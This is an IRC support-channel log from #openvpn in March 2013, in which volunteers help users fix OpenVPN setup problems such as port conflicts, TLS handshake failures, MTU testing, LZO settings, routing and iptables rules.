timeout: 248 seconds] 03:41 -!- Porkepix [~Porkepix@net-2-40-85-103.cust.dsl.teletu.it] has joined #openvpn 03:50 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 04:00 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 04:08 -!- JSharpe [~JSharpe@46.165.208.207] has joined #openvpn 04:46 < jzaw> pls may i have some feedback / advice if i have a routed home lan (all non rfc1918 ips ie 81.2.122.x/26) 04:46 < jzaw> do i have to have a separate subnet for the openvpn server ? or can i use some of that /26 04:47 < jzaw> to be aware its almost entirely utilised except for some 10 consecutive ips 04:47 < jzaw> and being remote to it i cant split it cos machines would fall off t'tubes 05:32 -!- dxtr [4574b2ad@unaffiliated/dxtr] has quit [Ping timeout: 256 seconds] 05:33 <@krzee> must use separate for --server 05:33 <@krzee> can use bi-directional NAT 05:44 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 06:05 -!- JackWinter [~jack@ppp-256.vo.lu] has quit [Quit: ZNC - http://znc.in] 06:08 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn 06:33 -!- Denial- [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has joined #openvpn 06:35 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [Ping timeout: 255 seconds] 06:35 -!- Denial- is now known as Denial 06:46 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 252 seconds] 06:53 -!- TommehM [~TomM@unaffiliated/tommehm] has quit [Quit: ZNC - http://znc.in] 06:54 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 06:59 < MacGyver> jzaw: If you use OpenVPN in bridging mode you can use the /26 as though those machines were on your home network, provided no more than 10 clients connect, afaik. 07:00 < MacGyver> jzaw: However, if you use it in routed mode then yes, you will need to use a separate subnet. 
You can also isolate part of the /26 to do that, I'd say, but I don't know if your setup would allow that. 07:01 -!- dxtr [~dxtr@unaffiliated/dxtr] has joined #openvpn 07:01 < MacGyver> jzaw: "Being remote" doesn't sound like a really good reason not to be able to split, but that's me. 07:02 < Dennis84> hi all 07:03 < MacGyver> jzaw: And instead of splitting you can also go krzee's route, and use SNAT/DNAT on top of an RFC1918 subnet. 07:11 -!- dxtr [~dxtr@unaffiliated/dxtr] has quit [Quit: leaving] 07:12 -!- dxtr [0005ac03@unaffiliated/dxtr] has joined #openvpn 07:13 -!- JackWinter1 [~jack@ppp-256.vo.lu] has joined #openvpn 07:15 -!- JackWinter [~jack@ppp-256.vo.lu] has quit [Ping timeout: 250 seconds] 07:33 < Dennis84> Wulf: are you available? 07:53 -!- Porkepix [~Porkepix@net-2-40-85-103.cust.dsl.teletu.it] has quit [Ping timeout: 264 seconds] 07:56 -!- Porkepix [~Porkepix@net-2-40-85-103.cust.dsl.teletu.it] has joined #openvpn 08:00 -!- Porkepix [~Porkepix@net-2-40-85-103.cust.dsl.teletu.it] has quit [Ping timeout: 240 seconds] 08:06 -!- Porkepix [~Porkepix@net-2-40-85-103.cust.dsl.teletu.it] has joined #openvpn 08:08 -!- TommehM [~TomM@unaffiliated/tommehm] has joined #openvpn 08:12 -!- Porkepix [~Porkepix@net-2-40-85-103.cust.dsl.teletu.it] has quit [Ping timeout: 260 seconds] 08:16 -!- Porkepix [~Porkepix@net-2-40-85-103.cust.dsl.teletu.it] has joined #openvpn 08:21 -!- Porkepix [~Porkepix@net-2-40-85-103.cust.dsl.teletu.it] has quit [Ping timeout: 260 seconds] 08:27 -!- Porkepix [~Porkepix@net-2-40-85-103.cust.dsl.teletu.it] has joined #openvpn 08:49 -!- JackWinter1 [~jack@ppp-256.vo.lu] has quit [Quit: ZNC - http://znc.in] 08:50 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn 08:52 -!- Porkepix [~Porkepix@net-2-40-85-103.cust.dsl.teletu.it] has quit [Ping timeout: 260 seconds] 09:01 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 09:45 -!- JackWinter [~jack@ppp-256.vo.lu] has left #openvpn ["Konversation terminated!"] 09:46 
-!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn 09:47 -!- JackWinter [~jack@ppp-256.vo.lu] has left #openvpn ["Konversation terminated!"] 09:48 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn 09:52 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 248 seconds] 10:09 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 10:19 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 10:19 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 240 seconds] 10:27 < jzaw> MacGyver, ta for the info ... hard coded ips ... and risk of boxes not coming back up if i typo 10:27 < jzaw> im 2,000km away 10:28 < jzaw> my tap0 on the opvn router is up and getting the expected ip ... but i cant even ping the server ip on the vpn 10:28 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 10:28 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 245 seconds] 10:29 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 10:30 -!- Porkepix [~Porkepix@157.138.190.113] has joined #openvpn 10:30 -!- novaflash is now known as novaflash_away 10:33 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Ping timeout: 276 seconds] 10:33 -!- novaflash_away is now known as novaflash 10:34 -!- Porkepix [~Porkepix@157.138.190.113] has quit [Ping timeout: 256 seconds] 10:40 -!- novaflash is now known as novaflash_away 10:40 -!- novaflash_away is now known as novaflash 10:48 -!- Porkepix [~Porkepix@157.138.190.113] has joined #openvpn 10:53 -!- Porkepix [~Porkepix@157.138.190.113] has quit [Ping timeout: 248 seconds] 10:56 -!- TommehM [~TomM@unaffiliated/tommehm] has quit [Excess Flood] 10:58 -!- TommehM [~TomM@unaffiliated/tommehm] has joined #openvpn 11:01 -!- Porkepix [~Porkepix@157.138.190.113] has joined #openvpn 11:05 -!- Porkepix [~Porkepix@157.138.190.113] has left #openvpn [] 11:19 -!- Orbi 
[~opera@anon-148-191.vpn.ipredator.se] has left #openvpn [] 11:20 -!- xtz [xtz@DeathStar.Techn0.eu] has joined #openvpn 11:43 -!- syn4pse [~syn@p5DDC0186.dip0.t-ipconnect.de] has joined #openvpn 11:44 -!- savr [~linux@unaffiliated/rvas] has joined #openvpn 11:45 < savr> openvpn was working a few days ago 11:45 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Read error: Connection reset by peer] 11:45 < savr> don't know what made it stop 11:45 <@ecrist> !logs 11:45 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 11:45 < savr> but now in the logs it is failing to assign port 1194 11:45 <@ecrist> generally, if it was working before, and it's not now, someone changed something 11:46 <@ecrist> savr: is another instance of openvpn listening on 1194, or another process? 11:46 < savr> Sat Mar 9 11:59:02 2013 UDPv4 link local (bound): [undef] 11:46 < savr> Sat Mar 9 11:59:02 2013 UDPv4 link remote: [undef] 11:46 < savr> nothing is according to nmap 11:46 < syn4pse> lsof -i :1194 11:46 <@ecrist> lsof -i TCP -i UDP | grep 1194 11:47 < savr> lsof: no pwd entry for UID 109 11:47 <@ecrist> heh, your server has issues 11:47 <@ecrist> your user doesn't exist, apparently 11:47 < savr> openvpn 18194 root 5u IPv4 224868 0t0 UDP *:openvpn 11:47 < savr> LOL 11:47 < savr> I'm root 11:47 <@ecrist> and that indicates openvpn is already looking at port 1194 11:47 < savr> how can I not exist 11:48 < syn4pse> only you know what u did to that box ;) 11:48 < savr> I did nothing!! 
11:48 < syn4pse> nano ~/.bash_history ;) 11:48 < savr> other than access it from china 11:49 < syn4pse> chinese goverment destroyed your box :p 11:49 < savr> it's possible they've hacked it 11:50 < savr> I got some strange hacking attempts from chinese IPs according to logwatch/fail2ban 11:50 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 11:50 < syn4pse> thats normal ^^ 11:51 <@ecrist> very normal 11:51 < syn4pse> i get those emial reports from lfd 24/7 ;) 11:52 < savr> actually!! I did do something 11:52 < savr> I added a new openvpn client 11:52 <@ecrist> :) 11:53 < syn4pse> savr, it might be usefull to check the log of your vpn client and see what that one says 11:55 < savr> add status /tmp/openvpn.log to the client config? 11:57 < savr> still... there is a port error on the server in the logs 11:57 < savr> one which isn't clear what it means to me 11:58 < pekster> If you're running >1 instance on any system, they need to listen/source from different ports. It generally makes sense to use 'nobind' from the client so it dynamically creates one 11:58 < savr> I'm not 11:58 < pekster> Otherwise, posting the log with errors would be useful 11:58 < savr> I just made a second client cert 11:59 < savr> pekster: I did at :46 11:59 < pekster> No, you pasted 2 lines of the log that are not actually errors 12:01 < syn4pse> was about to say the same ;) 12:01 < savr> http://pastebin.com/gEZ9su2s 12:02 < syn4pse> i don`t see errors there 12:02 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 12:03 < syn4pse> check ur logs on the client side 12:03 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 264 seconds] 12:04 < savr> doing so 12:04 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 12:05 < syn4pse> savr, can u connect to it at least 12:05 < syn4pse> ? 
12:05 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Read error: Connection reset by peer] 12:06 < savr> no 12:06 < syn4pse> okey then ur client log will show why 12:07 < savr> it's just hanging 12:07 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 240 seconds] 12:07 < syn4pse> oO 12:09 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 12:12 < savr> http://pastebin.com/uEy9S39B 12:15 < pekster> savr: It's often a firewall problem that prevents the client from failing to establish a connection like that. The client simply never hears back from the server. If your server logs don't show an "initial packet received" message, then you need to figure out why your connection isn't getting to the other side 12:15 < pekster> "prevents the client from establishing" that should have read 12:16 < savr> http://pastebin.com/cLaXsZk3 12:17 < savr> from the server 12:17 < savr> so the server IS getting the packet 12:17 -!- master_o1_master [~master_of@p4FF24A96.dip.t-dialin.net] has joined #openvpn 12:17 < savr> seems like somehow the keys are broken right? 12:18 < pekster> No, certificate errors expltitly state such. Post both the server & client configs 12:18 < rob0> seems like you are not reading. 12:18 < savr> let me google tls handshake lol 12:19 < rob0> sure, have fun. But until the client reaches the server, there is no TLS handshake. 12:20 < savr> that final log was from the server 12:20 < savr> the server is obviously getting something 12:20 < savr> is this handshaking done on port 1194? 12:20 -!- master_of_master [~master_of@p4FF24B3D.dip.t-dialin.net] has quit [Ping timeout: 252 seconds] 12:21 < pekster> Everything is done over a single UDP port 12:21 < pekster> !configs 12:21 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. 
or (#2) dont forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config 12:22 < rob0> You did not paste anything which said "initial packet received". 12:24 < savr> rob0: but the server obviously received a packet according to those logs? 12:24 < savr> http://pastebin.com/QsfYQJte 12:33 < pekster> Could be MTU issues possibly, although it would be nice to see the server log starting from when the client actually connected. Trying to be "clever" and showing only small bits of the log means you get small bits of insight into your problem 12:34 < pekster> Adding --mtu-test to the client lets OpenVPN test the MTU itself, or use standard ping or trace tools to do it yourself 12:35 < savr> hmm sorry... the log seemed like it was repeating it self with the same error 12:36 < savr> umm there is nothing in the log that wasn't already in http://pastebin.com/gEZ9su2s and http://pastebin.com/cLaXsZk3 12:39 -!- Eagleman [~Eagleman@vpn.eagleman.net] has joined #openvpn 12:39 < savr> pekster: just getting a flood of TUN errors 12:39 < savr> Sun Mar 10 02:39:32 2013 read from TUN/TAP : File descriptor in bad state (code=77) 12:41 < savr> command I used was: openvpn --mtu-test --dev tun 12:41 < pekster> You might want to read the manpage and what I wrote a little more carefully 12:41 < pekster> That's not how you use --mtu-test 12:42 -!- Eagleman7 [~Eagleman@vpn.eagleman.net] has joined #openvpn 12:43 < Eagleman7> Are there ways to increase ping ( x3 the normal value ) when using redirect gateway? 12:44 -!- Eagleman [~Eagleman@vpn.eagleman.net] has quit [Ping timeout: 264 seconds] 12:45 < pekster> Eagleman7: What are you trying to do? 12:46 < Eagleman7> Increase the ping for in a multiplayer game 12:46 < pekster> The OpenVPN --ping directive? 
12:47 < pekster> If you're talking about traffic flowing across a tunnel, OpenVPN does not care/check/act based on what the packet's contents is 12:47 < Eagleman7> pekster, no, normally i got 150 ping to a server in the usa, in want to increase the ping using some methods in openvpn, so it goes to 450 12:48 < Eagleman7> It sounds a bit weird, normally you want to decrease the ping to a server 12:48 < savr> pekster: there aren't any examples in the manpage... unless I'm reading the wrong version. running just --mtu-test says I need to specify TUN/TAP 12:48 <@plaisthos> if your server is *BSD you can use ipfw 12:48 < Eagleman7> I'm using linux :( 12:49 <@plaisthos> ipfw pipe 1 config delay 250ms bw 1Mbit/s 12:49 <@plaisthos> maybe linux has something similar 12:49 <@plaisthos> try to ask in linux/iptables related channel 12:49 < pekster> iproute2's 'tc' tool is how you do queuing/shaping/traffic control 12:49 < pekster> That's outside the scope of OpenVPN though 12:50 < pekster> savr: You missed the part where it says "add thet --mtu-test option TO YOUR CONFIGURATION" (emphasis mine.) I also said this above in my earlier message 12:50 < Eagleman7> aha, thanks 12:50 < pekster> You cannot just run it from the command line as the line you pasted is not a full configuration 12:50 < savr> pekster: i've added my config 12:51 < pekster> That's not what you said earlier 12:51 < savr> if I ran it blank then I wouldn't have got the error 12:51 < savr> unless configuration means something else from what I think it means 12:51 < savr> somewhat of a noob here 12:52 -!- p3rror [~mezgani@41.140.216.173] has joined #openvpn 12:52 < pekster> Your existing configuration file. 
You drop in the --mtu-test option and let it run for a few minutes and it returns the largest packet it can get through 12:52 < savr> pekster: yeah doing that just floods me with the tun error above 12:56 < savr> detailed log: http://pastebin.com/Zuc02LqA 12:58 < pekster> You do this on your client, not the server. You also cannot pass a config file without using the --config option unless it is the *only* option after the command 12:59 < pekster> The errors/warnings about not using encryption and failure to open the tun device should have been hints that something was not right 13:00 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Read error: Connection reset by peer] 13:00 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 13:00 < pekster> Here's what a functinal and working server-side log looks like when the client connects: http://paste.kde.org/691436/ 13:01 < savr> ok adding --config let the command run 13:01 < savr> silly me lol 13:02 < savr> I was running it client side at least. 13:02 < pekster> You named your client config 'server.ovpn' ? 13:02 < pekster> That's functional I suppose but confusing 13:03 < savr> lol.... it is so I know the connect is to the server and not somewhere else 13:03 -!- p3rror [~mezgani@41.140.216.173] has quit [Quit: Leaving] 13:04 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 13:07 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 255 seconds] 13:09 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 13:09 -!- p3rror [~mezgani@41.140.216.173] has joined #openvpn 13:13 -!- MeanderingCode_ [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Ping timeout: 276 seconds] 13:13 < savr> pekster: http://pastebin.com/vRwPH7zW 13:15 < pekster> Okay, so it still can't get a TLS handshake. 
For whatever reason, looks like packets are getting lost of mangled on their way to your server and OpenVPN is unable to perform the initial handshake 13:16 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has quit [Read error: Connection reset by peer] 13:17 < pekster> of=or 13:19 < savr> interesting... it is failing from my wired connection and 3g connection in china 13:19 -!- MeanderingCode [~Meanderin@71-213-186-243.albq.qwest.net] has joined #openvpn 13:20 < savr> wonder if the great firewall of china has anything to do with it 13:20 < savr> well thank god for ssh proxy 13:22 < savr> guess I'll find out if it is some other problem once I leave china... 13:29 -!- sanfran [~sanfran@108-61-41-219ch.openskytelcom.net] has joined #openvpn 13:33 < savr> thanks pekster good night 13:33 -!- savr [~linux@unaffiliated/rvas] has quit [Quit: Ex-Chat] 13:33 -!- levifig [~levifig@spwn.co] has quit [Excess Flood] 13:34 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 260 seconds] 13:34 -!- levifig [~levifig@spwn.co] has joined #openvpn 13:36 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 13:38 < jzaw> can openvpn work in a qemu-kvm VM ... its a virtual nic ... briged to host nic 13:38 < jzaw> thus a tap0 would be bridged to a bridge in effect 13:39 < jzaw> i mean in bridged mode tap of course 13:40 < rob0> um, the qemu-kvm bridge does not mean that openvpn needs to be bridged ... 13:40 -!- p3rror [~mezgani@41.140.216.173] has quit [Quit: Leaving] 13:40 < jzaw> but at the mo id like to try bridged if i can 13:40 < jzaw> ipv6 amongst other things 13:40 < jzaw> though i hear 2.3.x does that now in routed? 13:41 < rob0> Bridging is usually not a good idea, but I'm not going to try to change your mind. Yes, 2.3 can handle ipv6 with tun. 13:41 < jzaw> you may have just changed my mind ;) 13:42 < jzaw> \0/ 13:42 < jzaw> out of interest ... why do you consider bridging not a good idea? 
13:43 < pekster> !tunortap
13:43 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Don't waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you
13:43 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! or (#5) Normal Android/iOS devices (not rooted/jailbroken) support only tun.
13:44 < jzaw> k thanks
13:45 < jzaw> the reason i ask if tap works in a VM is that i'm getting a tap0, it's getting an ip ... there is some sort of traffic (prob vpn chatter) but i can't ping and can't do owt else down the tap
13:46 < pekster> The host may not allow use of arbitrary IPs by a guest like that
13:48 < jzaw> the vpn ips are real ones from my /26 the host and VM sit on
13:48 < jzaw> just empty spare and unused in a small consecutive block
14:41 < Azrael_-> hi
14:42 < seraphim> hi, got some question. set up openvpn server on debian successfully and connected a windows client successfully using the server via iptables NAT as gateway. problem: without VPN bandwidth: 20MBit/s, through VPN: 10-12Mbit/s using the same speed test. the server does definitely have enough bandwidth to handle this (full duplex 100mbit uplink).
already switched the UDP port to non-default to check whether my provider is slowing it down artificially but it does
14:42 < seraphim> talking about downstream
14:45 < seraphim> anyone got an idea?
15:04 < Eagleman> try the --replay-window
15:04 < Eagleman> ow
15:20 < pekster> verb 4 will show you "replay window backtrack occurred" messages that'll let you know if the replay is an issue and by how much
15:31 < pekster> Further, a better way to test speed is a file transfer to your server with and without the VPN. It could simply be a difference in speedtest results from different physical locations
--- Day changed Sun Mar 10 2013
00:59 < antiisolo> hello, i just installed openvpn server for the first time, and whenever i connect from the client, i receive this error Bad LZO decompression header byte: 42
00:59 < antiisolo> any ideas?
01:38 < pppingme> antiisolo do you have LZO enabled on *BOTH* ends?
01:56 < antiisolo> pppingme yes
01:58 < pekster> antiisolo: I'm not here much longer tonight, but the lzo parameter needs to match exactly. If you use 'comp-lzo adaptive' it must be the same on the other end
01:59 < pppingme> antiisolo does it seem to work but just getting a lot of those errors, or is it totally broke?
01:59 < pekster> Values of on/off/adaptive (or unspecified completely) should match between peers. Note also that you can push the lzo option from the server, thus ensuring it matches (and as an added bonus you can change it centrally later too)
03:01 < antiisolo> pppingme at first it was just totally broken, now it just stops at push_request
03:02 < antiisolo> pekster: thanks I'll look more into that
03:04 < antiisolo> I have been getting to this Sun Mar 10 04:03:04 2013 client1/71.202.51.90:59635 PUSH: Received control message: 'PUSH_REQUEST'
03:04 < antiisolo> Sun Mar 10 04:03:04 2013 client1/71.202.51.90:59635 SENT CONTROL [client1]: 'PUSH_REPLY,route 192.168.1.0 255.255.255.0,route 10.8.0.1,topology net30,ping 10,ping-restart 120,ifconfig 10.8.0.6 10.8.0.5' (status=1)
03:05 < antiisolo> then it doesn't say anything else..
but no websites work
03:24 < Velua> hey
03:25 < Velua> when i connect to my openvpn server as a client am i meant to be able to ping it at 10.8.0.1?
03:25 < Velua> hello....?
03:25 < pppingme> that would depend on how your server is setup
03:26 < Velua> it's all default,
03:26 < Velua> just did a fresh install.. just curious if that's normal or not..?
03:26 < pppingme> I think that's the default IP, I never use it..
03:26 < Velua> yeah i think it is too, but when I ping it i get no response.. Is that normal or bad?
03:27 < pppingme> antiisolo are you pushing a default route? what about dns? what error are you getting on the web browser?
03:27 < pppingme> Velua possibly just a bogus firewall rule blocking icmp
03:28 < Velua> okay thanks, I'm also trying to route to another subnet from the VPN's one
03:29 < Velua> I'm just putting the route in my router.. how many hops should I have?
03:29 < Velua> I basically know what a hop is.. but should I have 0 or 1 in it or.. could i get away with 99? like is that just the max it will let happen or what..?
03:30 < Velua> brb
03:30 < pppingme> your router is asking how many hops?
03:35 < antiisolo> ppingme the browser is just getting a website can not be displayed.. ping says destination is unreachable...
03:35 < pppingme> ok, that would infer dns is ok, and it's either routing, or firewall rules
03:36 < pppingme> you're trying to route EVERYTHING over the vpn? like paranoia mode?
03:36 < antiisolo> yeah, was hoping to route all traffic
03:37 < pppingme> do a traceroute to 8.8.8.8
03:37 < pppingme> and paste it
03:38 < pppingme> what OS is the client?
03:39 < antiisolo> traceroute to 8.8.8.8 (8.8.8.8), 30 hops max, 60 byte packets
03:40 < antiisolo> send: Operation not permitted
03:40 < antiisolo> debian
03:41 < pppingme> paste the output of "ip route show"
03:43 < antiisolo> default via 10.8.0.5 dev tun0 proto static
03:43 < antiisolo> 10.8.0.1 via 10.8.0.5 dev tun0 proto static
03:43 < antiisolo> 10.8.0.5 dev tun0 proto kernel scope link src 10.8.0.6
03:43 < antiisolo> 169.254.0.0/16 dev wlan1 scope link metric 1000
03:43 < antiisolo> 173.230.151.8 via 192.168.0.1 dev wlan1 proto static
03:43 < antiisolo> 192.168.0.0/24 dev wlan1 proto kernel scope link src 192.168.0.197 metric 2
03:43 < antiisolo> 192.168.1.0/24 via 10.8.0.5 dev tun0 proto static
03:45 < pppingme> what's the 192.168.1.x about?
03:45 < antiisolo> lol i think i was randomly following a tutorial online
03:45 < pppingme> except for that (which isn't what's breaking you) it looks correct
03:46 < pppingme> that most likely leaves firewall rules, and most likely on the server
03:54 < pppingme> you can paste those if you want someone to look at them
03:57 < pppingme> I'm assuming you have ip forwarding turned ON for the vps?
04:07 < antiisolo> yes
04:18 < marisn> whoever removed warnings about \ in config files for 2.3.0 - big thanks. Spent many hours to discover it by installing an older version.
05:24 < Ancient> !goal
05:24 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc
05:24 < Ancient> =j ##opeszps
05:26 < Ancient> Can anyone direct me to the bug tracker for the "official" iOS & Android clients?
06:02 <@plaisthos> Ancient: is there no link etc. in the apps?
06:46 < Ancient> plaisthos, I don't have a device capable of running either unfortunately, however I happen to be on the server end of things
06:46 < Ancient> and I have a bug to file accordingly
06:46 < Ancient> So unfortunately, I'm not sure
06:47 < Ancient> I went through the openvpn website, and couldn't find anything either
08:01 < mintux> i installed openvpn on my debian server and in ubuntu client i could not connect, i got this error in client: TLS Error: Unroutable control packet received from [AF_INET]192.168.1.12:1194 (si=3 op=P_CONTROL_V1) and in server log i have: TLS Error: TLS handshake failed .
TLS Error: TLS key negotiation failed to occur within 60 seconds
08:03 < mintux> it's my server and client config http://codepad.org/Kuc6ma44
08:03 <@vpnHelper> Title: C code - 35 lines - codepad (at codepad.org)
08:38 < mintux> now i got this error: UDPv4 [ECONNREFUSED]: Connection refused (code=111) on server and output of iptables -L -n -v is : http://codepad.org/ab1iNI6k
08:38 <@vpnHelper> Title: C code - 10 lines - codepad (at codepad.org)
08:38 < mintux> is anybody here?
09:29 <@ecrist> mintux: that looks like a firewall issue
09:37 < mintux> ecrist: i put every detail here https://forums.openvpn.net/topic12399.html
09:37 <@vpnHelper> Title: OpenVPN Support Forum [ECONNREFUSED]: Connection refused (code=111) : Configuration (at forums.openvpn.net)
09:38 <@ecrist> mintux: I don't generally diagnose firewall issues
09:38 <@ecrist> we don't, as a policy in this channel
09:38 <@ecrist> code 111 is almost always caused by a firewall. you need to allow openvpn traffic
09:38 <@EugeneKay> I charge $150/hr for it
09:39 -!- mode/#openvpn [-o EugeneKay] by ecrist
09:39 <@ecrist> now he's half-price
09:39 <@ecrist> :P
09:39 < mintux> ecrist: i did it on iptables
09:39 * EugeneKay cries
09:39 -!- mode/#openvpn [+o EugeneKay] by ChanServ
09:41 < mintux> ecrist: # iptables -L -n
09:41 < mintux> ACCEPT     udp  --  0.0.0.0/0            0.0.0.0/0           udp dpt:1194
09:41 <@EugeneKay> The fact that you're seeing refused on the SERVER means that you have bad rules on the CLIENT.
09:42 <@EugeneKay> The server is getting the initial packet just fine; the response is being refused
09:43 < mintux> EugeneKay: it's my config http://codepad.org/yKmkjslJ and output
09:43 <@vpnHelper> Title: C code - 79 lines - codepad (at codepad.org)
09:43 <@EugeneKay> I really don't care enough to read through it to find the problem
09:43 <@EugeneKay> I have bacon coming soon ^_^
09:44 <@ecrist> !firewall
09:44 <@vpnHelper> "firewall" is (#1) please see http://openvpn.net/man#lbBD for more info or (#2) see http://www.secure-computing.net/wiki/index.php/OpenVPN/Firewall for brief notes on disabling firewall rulesets.
09:44 <@EugeneKay> I'd say sorry, but I'm never apologetic about bacon.
09:47 < mintux> ecrist: i disabled the firewall like everything written in http://www.secure-computing.net/wiki/index.php/OpenVPN/Firewall and no difference in output
09:47 <@vpnHelper> Title: OpenVPN/Firewall - Secure Computing Wiki (at www.secure-computing.net)
09:47 <@ecrist> on client AND server?
09:48 < mintux> only on server
09:48 <@ecrist> EugeneKay just told you to do it on your client, as well
09:48 < mintux> i will do it on client also
09:50 < mintux> ecrist: no difference, same result :-(
09:50 <@EugeneKay> Mmmmmm bacon
09:50 < mintux> TLS Error: Unroutable control packet received from
09:52 * ecrist poofs for the auto show
14:19 < syn4pse-> what is the best way to disable communication between vpn clients?
14:20 < pekster> syn4pse-: Don't use the client-to-client directive and firewall the traffic as usual for your OS
14:20 < pekster> !c2c
14:20 <@vpnHelper> "c2c" is "client-to-client" is with this option packets from 1 client to another are routed inside the server process. without it packets leave the server process, hit the kernel (firewall, routing table) and if allowed by firewall and routed back to server process, they go to the client. you use this option when you do not want to use selective firewall rules on what clients can access things
14:20 <@vpnHelper> behind other clients
14:21 < syn4pse-> okay so basically disable client-to-client in config and then use iptables to restrict talk between those clients?
14:22 < pekster> Right
14:23 < pekster> It'll show up as forwarded traffic, so if you use a Linux-based OS, set up whatever rules you require on the FORWARD chain to suit your needs
14:24 < syn4pse-> iptables -A FORWARD -d 10.8.0.0/24 -j DROP
14:24 < syn4pse-> if 10.8.0.0 were my vpn subnet?
14:26 < pekster> Possibly, I don't know enough about your setup to say. That will match traffic being forwarded from some other network to VPN clients too, such as return traffic from a server-side LAN or gateway redirect situation
14:27 < syn4pse-> i have a vps and i have openvpn setup there, it should only forward traffic from the openvpn clients to the internet ( anon browsing basically )
14:27 < syn4pse-> there are no further lans attached to the vpn server
14:28 < syn4pse-> pekster, would that rule mean that traffic returning to the clients will be dropped as well ?
14:28 < syn4pse-> iptables -A FORWARD -d 10.8.0.0/24 -s 10.8.0.0/24 -j DROP
14:28 < syn4pse-> might it be smarter to also specify the source ?
14:29 < pekster> Probably, if your goal is to prevent the clients from communicating
14:29 < syn4pse-> i'll give it a try ;)
14:30 < pekster> IMO a smarter way to do that would be to use a DROP policy on your FILTER chain, and allow only traffic you wish to forward, but that's more of a topic for #netfilter which focuses on Linux/netfilter setup
14:30 < pekster> Then you don't need to "block" anything, you simply don't write a rule to accept it
14:36 < syn4pse-> okay i tried it, doesn't seem to work
14:37 < syn4pse-> i'll prolly start by reading the man page of iptables ;)
14:37 < syn4pse-> thanks for the idea
14:38 < pekster> There are some good guides linked from the first URL you'll find in the #netfilter /TOPIC if you need a more basic guide. The frozentux guide is one I've referenced/used in the past
14:39 < syn4pse-> cool
17:13 < sqwerty> !paste
17:13 <@vpnHelper> "paste" is "pastebin" is (#1) please paste anything with more than 5 lines into pastebin or a similar website or (#2) https://gist.github.com is a recommended place to use
17:13 < sqwerty> !configs
17:13 <@vpnHelper> "configs" is (#1) please pastebin your client and server configs (with comments removed, you can use `grep -vE '^#|^;|^$' server.conf`), also include which OS and version of openvpn. or (#2) don't forget to include any ccd entries or (#3) on pfSense, see http://www.secure-computing.net/wiki/index.php/OpenVPN/pfSense to obtain your config
19:10 < JacquesBH> Hi :)
19:10 < JacquesBH> Somebody here?
19:10 < JacquesBH> I don't know what time it is in your part of the world :D
19:10 < pekster> !ask
19:10 <@vpnHelper> "ask" is don't ask to ask, just ask your question please, see this link for how to get help on IRC: http://workaround.org/getting-help-on-irc
19:12 < JacquesBH> hello pekster :) oki sorry, I ask.
19:12 < JacquesBH> I can connect two computers to the VPN and I can ping the server
19:13 < JacquesBH> but from C1 (computer One) I can't ping C2 (computer 2)
19:13 < pekster> !c2c
